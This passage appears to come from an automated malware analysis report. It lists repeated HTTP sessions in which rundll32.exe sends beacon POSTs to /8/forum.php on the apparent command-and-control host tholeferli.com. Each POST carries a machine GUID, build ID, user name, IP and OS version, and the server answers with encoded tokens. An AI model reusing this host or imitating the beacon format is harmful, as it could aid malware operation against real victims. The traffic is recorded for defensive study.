                                                Data Ascii: cCAZXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                203192.168.2.2249370194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:47.194482088 CEST523OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:47.664597988 CEST523INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:47 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 41 5a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNAZMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                204192.168.2.2249371194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:47.959105015 CEST524OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:48.116082907 CEST524INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:47 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZVEAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                205192.168.2.2249372194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:48.397820950 CEST525OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:49.555432081 CEST525INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4a 51 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGJQTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                21192.168.2.2249188194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:12.851239920 CEST319OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:14.007266998 CEST319INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:13 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZVEAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                22192.168.2.2249189194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:15.462692022 CEST320OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:15.616853952 CEST320INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMJQNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                23192.168.2.2249190194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:15.904902935 CEST321OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:16.062848091 CEST321INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4b 50 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJKPQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                24192.168.2.2249191194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:16.376070976 CEST322OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:16.542682886 CEST322INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:16 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 43 58 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFCXUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                25192.168.2.2249192194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:16.824492931 CEST323OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:17.994708061 CEST323INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:17 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAZAZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                26192.168.2.2249193194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:18.275527954 CEST324OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:18.446471930 CEST324INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 43 41 5a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cCAZXARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                27192.168.2.2249194194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:18.738598108 CEST325OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:18.908724070 CEST326INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:18 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 48 53 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZHSAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                28192.168.2.2249195194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:19.188211918 CEST326OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:19.343904018 CEST327INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNKPMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                29192.168.2.2249196194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:19.614252090 CEST328OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:19.770859003 CEST328INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:19 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 43 58 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQCXJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.2249170194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:05.626411915 CEST292OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:05.795413971 CEST292INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:05 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 41 47 54 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cAGTZARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                30192.168.2.2249197194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:20.081789017 CEST329OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:20.239052057 CEST329INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:20 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 5a 41 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNZAMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                31192.168.2.2249198194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:20.521209002 CEST330OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:21.975286007 CEST330INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:21 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZMNAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                32192.168.2.2249199194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:22.258954048 CEST331OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:22.426027060 CEST331INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:22 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 51 4a 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGQJTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                33192.168.2.2249200194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:22.720313072 CEST332OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:22.876840115 CEST332INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:22 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVZAEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                34192.168.2.2249201194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:23.162344933 CEST333OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
